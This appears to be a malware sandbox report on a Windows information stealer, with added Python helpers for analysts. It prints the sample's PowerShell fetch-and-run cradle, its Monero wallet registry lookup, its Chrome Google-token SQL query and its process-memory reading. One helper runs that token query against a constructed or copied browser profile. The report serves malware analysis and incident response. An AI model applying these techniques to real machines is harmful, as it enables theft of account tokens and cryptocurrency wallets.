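        if c.name == "GetDeviceCaps" and len(c.args) >= 2 and isinstance(c.args[1], int):
            names.append(DEVICE_CAPS.get(c.args[1], f"index {c.args[1]}"))
    return names


def profiling_labels(calls: List[Call]) -> List[str]:
    """Distinct 'Label: ' string arguments, in first-seen order (heuristic, editor's own)."""
    seen: List[str] = []
    for c in calls:
        for a in c.args:
            if isinstance(a, str) and a.endswith(": ") and a not in seen:
                seen.append(a)
    return seen


def summarize(text: str) -> dict:
    """Triage summary for one function entry."""
    calls = parse_listing(text)
    caps = device_caps_queried(calls)
    return {
        "calls": len(calls),
        "modules": sorted({c.module for c in calls}),
        "reads_display_resolution": "HORZRES" in caps and "VERTRES" in caps,
        "labels": profiling_labels(calls),
        "subcalls": sorted({c.parent for c in calls if c.parent is not None}),
    }


if __name__ == "__main__":
    print(summarize(SAMPLE_LISTING))
```

Running it on the entry above yields reads_display_resolution True, the five labels in the order the stack shows them, and the single subcall 001904BC; pasting another entry's lines into parse_listing gives the same structured view, which is what makes entries such as this one stand out from the LIBCMT name-undecoration helpers listed before it.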
Strings
Memory Dump Source
• Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
• Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
Yara matches
Similarity
• API ID: CapsDeviceHeap$AllocCreateProcessReleaselstrcpywsprintf
• String ID: %dx%d
• API String ID: 3940144428-2206825331
• Opcode ID: 4dc4a18d9684fdd16464321f48985416fb7e3241bc916cabcb0a37bfd880b6fd
                                                                                                                                                                        • Instruction ID: 3df507d4297b80a6b286044508676358331bd2168b110778e5bad3473f515894
                                                                                                                                                                        • Opcode Fuzzy Hash: 4dc4a18d9684fdd16464321f48985416fb7e3241bc916cabcb0a37bfd880b6fd
                                                                                                                                                                        • Instruction Fuzzy Hash: C3F04F76642220BBE7123BA5FC4DDAB7F6CEF4ABA5F000416FA05DB160D6B45D008BA4
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 001904EE: lstrcpyA.KERNEL32(00000000,?,?,00181D07,?,00197663), ref: 0019050D
                                                                                                                                                                          • Part of subcall function 00184AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00184AE8
                                                                                                                                                                          • Part of subcall function 00184AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00184AEE
                                                                                                                                                                          • Part of subcall function 00184AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00184AF4
                                                                                                                                                                          • Part of subcall function 00184AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00184B06
                                                                                                                                                                          • Part of subcall function 00184AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00184B0E
                                                                                                                                                                        • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00186836
                                                                                                                                                                        • StrCmpCA.SHLWAPI(?), ref: 00186856
                                                                                                                                                                        • InternetOpenUrlA.WININET(?,?,00000000,00000000,-00800100,00000000), ref: 00186877
                                                                                                                                                                        • CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00186892
                                                                                                                                                                        • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 001868C8
                                                                                                                                                                        • InternetReadFile.WININET(00000000,?,00000400,?), ref: 001868F8
                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00186923
                                                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 0018692A
                                                                                                                                                                        • InternetCloseHandle.WININET(?), ref: 00186936
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2507841554-0
                                                                                                                                                                        • Opcode ID: 4ec193fa2feb926c3e207808a3c19bd6a7e000660a7ec349e0e1840f6b822a1d
                                                                                                                                                                        • Instruction ID: c08891ce38132c3547cb02f5d33069ecbdb246550fe1cddcb6422894762df5cb
                                                                                                                                                                        • Opcode Fuzzy Hash: 4ec193fa2feb926c3e207808a3c19bd6a7e000660a7ec349e0e1840f6b822a1d
                                                                                                                                                                        • Instruction Fuzzy Hash: 9B411AB1901128ABDF21AF60ED45BDA7BBCFB04315F1005A6FB09A6161DB309E858FA5
                                                                                                                                                                        APIs
                                                                                                                                                                        • _free.LIBCMT ref: 001A6684
                                                                                                                                                                        • _free.LIBCMT ref: 001A6692
                                                                                                                                                                        • _free.LIBCMT ref: 001A669D
                                                                                                                                                                        • _free.LIBCMT ref: 001A6671
                                                                                                                                                                          • Part of subcall function 0019D98B: HeapFree.KERNEL32(00000000,00000000,?,0019D1D3,00000000,001BB6F4,0019D21A,0018EE93,?,?,0019D304,001BB6F4,?,?,001AEC88,001BB6F4), ref: 0019D9A1
                                                                                                                                                                          • Part of subcall function 0019D98B: GetLastError.KERNEL32(?,?,?,0019D304,001BB6F4,?,?,001AEC88,001BB6F4,?,?,?), ref: 0019D9B3
                                                                                                                                                                        • ___free_lc_time.LIBCMT ref: 001A66BB
                                                                                                                                                                        • _free.LIBCMT ref: 001A66C6
                                                                                                                                                                        • _free.LIBCMT ref: 001A66EB
                                                                                                                                                                        • _free.LIBCMT ref: 001A6702
                                                                                                                                                                        • _free.LIBCMT ref: 001A6711
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _free$ErrorFreeHeapLast___free_lc_time
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3704779436-0
                                                                                                                                                                        • Opcode ID: 043201e2c37b0404a8f32b9aa27cd0eef1f5011780d2588a33a194a15a9e14e4
                                                                                                                                                                        • Instruction ID: 08783690665eeb711fdf97299c68dbe8083deb529513a245d2058d1f1443043c
                                                                                                                                                                        • Opcode Fuzzy Hash: 043201e2c37b0404a8f32b9aa27cd0eef1f5011780d2588a33a194a15a9e14e4
                                                                                                                                                                        • Instruction Fuzzy Hash: 3711C4B6110701DBDF20BF65E886B99B3A5AB1271DF1C093AF10A97111CB30A850CA22
                                                                                                                                                                        APIs
                                                                                                                                                                        • ??_U@YAPAXI@Z.MSVCRT(00064000,?,?,?), ref: 0018FB27
                                                                                                                                                                        • OpenProcess.KERNEL32(001FFFFF,00000000,00000000), ref: 0018FB53
                                                                                                                                                                        • _memset.LIBCMT ref: 0018FB96
                                                                                                                                                                        • ??_V@YAXPAX@Z.MSVCRT(?), ref: 0018FCEC
                                                                                                                                                                          • Part of subcall function 0018F005: _memmove.LIBCMT ref: 0018F01F
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
Yara matches
Similarity
• API ID: OpenProcess_memmove_memset
• String ID: N0ZWFt
• API String ID: 2647191932-431618156
• Opcode ID: 55fc93c48107c6b73c2ab6974843768a137af029b6e822c621839075f8a2ce8e
• Instruction ID: f5ca72d35da8d704169d9a40f5fecc65adf9848f0dcc77bf83cb18e8be8e2323
• Opcode Fuzzy Hash: 55fc93c48107c6b73c2ab6974843768a137af029b6e822c621839075f8a2ce8e
• Instruction Fuzzy Hash: 2F516AB190022C9FCB24AF64CC85AEDB7B9AB54304F0101FEE609A7152EB716F89CF55
APIs
• ??_U@YAPAXI@Z.MSVCRT(00000000,?,00000000,00000000,?,?,?,?,?,0018FBB8,?,00000000,00000000,?,?), ref: 0018F909
• VirtualQueryEx.KERNEL32(?,00000000,?,0000001C,?,?,?,?,?,?,?,?,0018FBB8,?,00000000,00000000), ref: 0018F933
• ReadProcessMemory.KERNEL32(?,00000000,?,00064000,00000000,?,?,?,?,?,?,?,?), ref: 0018F980
• ReadProcessMemory.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0018F9D9
• VirtualQueryEx.KERNEL32(?,?,?,0000001C), ref: 0018FA31
• ??_V@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,0018FBB8,?,00000000,00000000,?,?), ref: 0018FA42
Strings
Memory Dump Source
• Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
Yara matches
Similarity
• API ID: MemoryProcessQueryReadVirtual
• String ID: @
• API String ID: 3835927879-2766056989
• Opcode ID: 1fdece4b323df11bf66f57dfcf15f21933dd16b51529cc547ee18769f523712d
• Instruction ID: c74b15f2a31672bed961c167102f22c454b9f4eb4249c08090496ea1ae935a04
• Opcode Fuzzy Hash: 1fdece4b323df11bf66f57dfcf15f21933dd16b51529cc547ee18769f523712d
• Instruction Fuzzy Hash: B7417C32A00209BBDF15AFA1DC49BEF7B76EB48764F148039FA04A6190D7758A52DF90
APIs
• GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 00181A65
• HeapAlloc.KERNEL32(00000000), ref: 00181A6C
• RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,00181AE9), ref: 00181A89
• RegQueryValueExA.ADVAPI32(00181AE9,wallet_path,00000000,00000000,00000000,000000FF), ref: 00181AA4
• RegCloseKey.ADVAPI32(00181AE9), ref: 00181AAD
Strings
• SOFTWARE\monero-project\monero-core, xrefs: 00181A7F
• wallet_path, xrefs: 00181A9C
Memory Dump Source
• Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
Yara matches
Similarity
• API ID: Heap$AllocCloseOpenProcessQueryValue
• String ID: SOFTWARE\monero-project\monero-core$wallet_path
• API String ID: 3466090806-4244082812
• Opcode ID: 8707ab4d0f9b66b910982da5ab87f18220316a2bd1e9590dfd3a3341684d00d4
• Instruction ID: caba3f27bd2b3776a1f161ac8e52bcdcd58c2d0e8af6f27d019b8b154f85ef64
• Opcode Fuzzy Hash: 8707ab4d0f9b66b910982da5ab87f18220316a2bd1e9590dfd3a3341684d00d4
• Instruction Fuzzy Hash: C0F05E76640304BFFB116B90EC0BFAE7F7CEB44B05F140125F701AA090D7B0AA409B20
APIs
  • Part of subcall function 001904BC: lstrcpyA.KERNEL32(00000000,00000000,?,001970BD,001B66BA,?,?,?,?,001985D1), ref: 001904E2
• lstrlenA.KERNEL32(?), ref: 00189B87
  • Part of subcall function 00191DF4: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00196973,?), ref: 00191E0C
• StrStrA.SHLWAPI(00000000,AccountId), ref: 00189BA4
• lstrlenA.KERNEL32(?), ref: 00189C53
• lstrlenA.KERNEL32(?), ref: 00189C6E
  • Part of subcall function 001905DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 001905F2
  • Part of subcall function 001905DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 0019061A
  • Part of subcall function 001905DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 00190625
  • Part of subcall function 0019059C: lstrcpyA.KERNEL32(00000000,?,0000000C,0019762B,001B66D6), ref: 001905CA
  • Part of subcall function 0019059C: lstrcatA.KERNEL32(?,?), ref: 001905D4
  • Part of subcall function 00190562: lstrcpyA.KERNEL32(00000000,?,00000000,001970FC,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 00190592
Strings
Memory Dump Source
• Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                         • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: lstrcpylstrlen$lstrcat$AllocLocal
                                                                                                                                                                        • String ID: AccountId$GoogleAccounts$GoogleAccounts$SELECT service, encrypted_token FROM token_service
                                                                                                                                                                        • API String ID: 3306365304-1713091031
                                                                                                                                                                        • Opcode ID: 1f8abbd26108f0ef2311e041ace06fbd39924b380e1fc4c6b76a26dffe1033a9
                                                                                                                                                                        • Instruction ID: 75f0551be4c61d3a7f8c4efdeb9f23ca5b057655b53c32c62cc9a363b78865c2
                                                                                                                                                                        • Opcode Fuzzy Hash: 1f8abbd26108f0ef2311e041ace06fbd39924b380e1fc4c6b76a26dffe1033a9
                                                                                                                                                                        • Instruction Fuzzy Hash: 1B81A332D00119ABDF02FBA4ED469DDBBB4EF29305F524061F910B71A2DB71AE468F91
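The String ID of the function above carries the exact SQL the sample runs against Chrome's per-profile "Web Data" SQLite database, together with the "AccountId" prefix Chrome uses to key cached Google refresh tokens. The block below is an added example, not code from the report or from the sample: it builds a constructed stand-in for that database (the table schema follows Chrome's token_service table; the blobs, gaia ids and the "v10" OSCrypt prefix are assumptions about Chrome's on-disk format, not something the report states) and runs the sample's query so an analyst can see what the stealer actually gets back, and what it still lacks.

```python
import sqlite3

# Exact query string from the function's String ID above.
TOKEN_QUERY = "SELECT service, encrypted_token FROM token_service"

# Chrome keys each cached Google refresh token as "AccountId-<gaia id>";
# the bare "AccountId" string in the listing is the stealer matching that
# prefix (assumption about Chrome's naming, not stated by the report).
ACCOUNT_PREFIX = "AccountId-"


def build_constructed_web_data():
    """Constructed stand-in for a Chrome "Web Data" file (not a real profile).

    Schema mirrors Chrome's token_service table. The blobs are fake and only
    carry the "v10" prefix Chrome's OSCrypt uses on Windows (assumption).
    """
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE token_service ("
        "service VARCHAR PRIMARY KEY NOT NULL, encrypted_token BLOB)"
    )
    rows = [
        ("AccountId-110000000000000000001", b"v10" + b"\x00" * 12 + b"\xaa" * 40),
        ("AccountId-110000000000000000002", b"v10" + b"\x01" * 12 + b"\xbb" * 40),
        ("lso", b"v10" + b"\x02" * 12 + b"\xcc" * 20),  # non-account row, ignored
    ]
    conn.executemany("INSERT INTO token_service VALUES (?, ?)", rows)
    conn.commit()
    return conn


def harvest_like_sample(conn):
    """Run the sample's query and keep only AccountId-keyed rows.

    Returns a sorted list of (gaia_id, blob_len, is_v10). Nothing is
    decrypted here: a "v10" blob is AES-GCM under a key that Chrome stores
    DPAPI-wrapped in "Local State", so the stealer can only open it while
    running as the profile owner on the victim host. That is the reason this
    code path runs locally instead of just exfiltrating the database file.
    """
    results = []
    for service, blob in conn.execute(TOKEN_QUERY):
        if not service.startswith(ACCOUNT_PREFIX):
            continue
        gaia_id = service[len(ACCOUNT_PREFIX):]
        results.append((gaia_id, len(blob), blob[:3] == b"v10"))
    return sorted(results)


def inspect_web_data(path):
    """Open a real, copied "Web Data" file read-only and report cached accounts.

    immutable=1 avoids SQLite's locking so the copy can be read while Chrome
    holds the original; run this on a copy, never on the live profile.
    """
    uri = "file:{}?mode=ro&immutable=1".format(path.replace("\\", "/"))
    conn = sqlite3.connect(uri, uri=True)
    try:
        return harvest_like_sample(conn)
    finally:
        conn.close()


if __name__ == "__main__":
    for gaia_id, blob_len, is_v10 in harvest_like_sample(build_constructed_web_data()):
        print("account {} token blob {} bytes v10={}".format(gaia_id, blob_len, is_v10))
```

For incident response the useful output is the list of gaia ids: each one is a Google account whose refresh token was reachable to the stealer on that host and should be treated as compromised until its sessions are revoked from the account's security settings. Passwords for those accounts are not needed by the attacker while the refresh token is valid.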
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 001904BC: lstrcpyA.KERNEL32(00000000,00000000,?,001970BD,001B66BA,?,?,?,?,001985D1), ref: 001904E2
                                                                                                                                                                          • Part of subcall function 001905DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 001905F2
                                                                                                                                                                          • Part of subcall function 001905DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 0019061A
                                                                                                                                                                          • Part of subcall function 001905DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 00190625
                                                                                                                                                                          • Part of subcall function 00190562: lstrcpyA.KERNEL32(00000000,?,00000000,001970FC,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 00190592
                                                                                                                                                                          • Part of subcall function 00191C1F: GetSystemTime.KERNEL32(?,001B66E2,?), ref: 00191C4E
                                                                                                                                                                          • Part of subcall function 0019059C: lstrcpyA.KERNEL32(00000000,?,0000000C,0019762B,001B66D6), ref: 001905CA
                                                                                                                                                                          • Part of subcall function 0019059C: lstrcatA.KERNEL32(?,?), ref: 001905D4
                                                                                                                                                                        • ShellExecuteEx.SHELL32(?), ref: 00192F00
                                                                                                                                                                        Strings
                                                                                                                                                                        • C:\ProgramData\, xrefs: 00192DE3
                                                                                                                                                                        • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00192E58
                                                                                                                                                                        • ')", xrefs: 00192E53
                                                                                                                                                                        • .ps1, xrefs: 00192E33
                                                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00192E9B
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: lstrcpy$lstrcat$ExecuteShellSystemTimelstrlen
                                                                                                                                                                        • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$.ps1$C:\ProgramData\$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                        • API String ID: 2215929589-1989157005
                                                                                                                                                                        • Opcode ID: 6a35eb19195bd90cc256e193a31a5490b649ada9fe487f900dc45db066f586a2
                                                                                                                                                                        • Instruction ID: 6de3917ab42fe9102ee335993e8e2e95e886e0910ffd072f9bf795196fb49121
                                                                                                                                                                        • Opcode Fuzzy Hash: 6a35eb19195bd90cc256e193a31a5490b649ada9fe487f900dc45db066f586a2
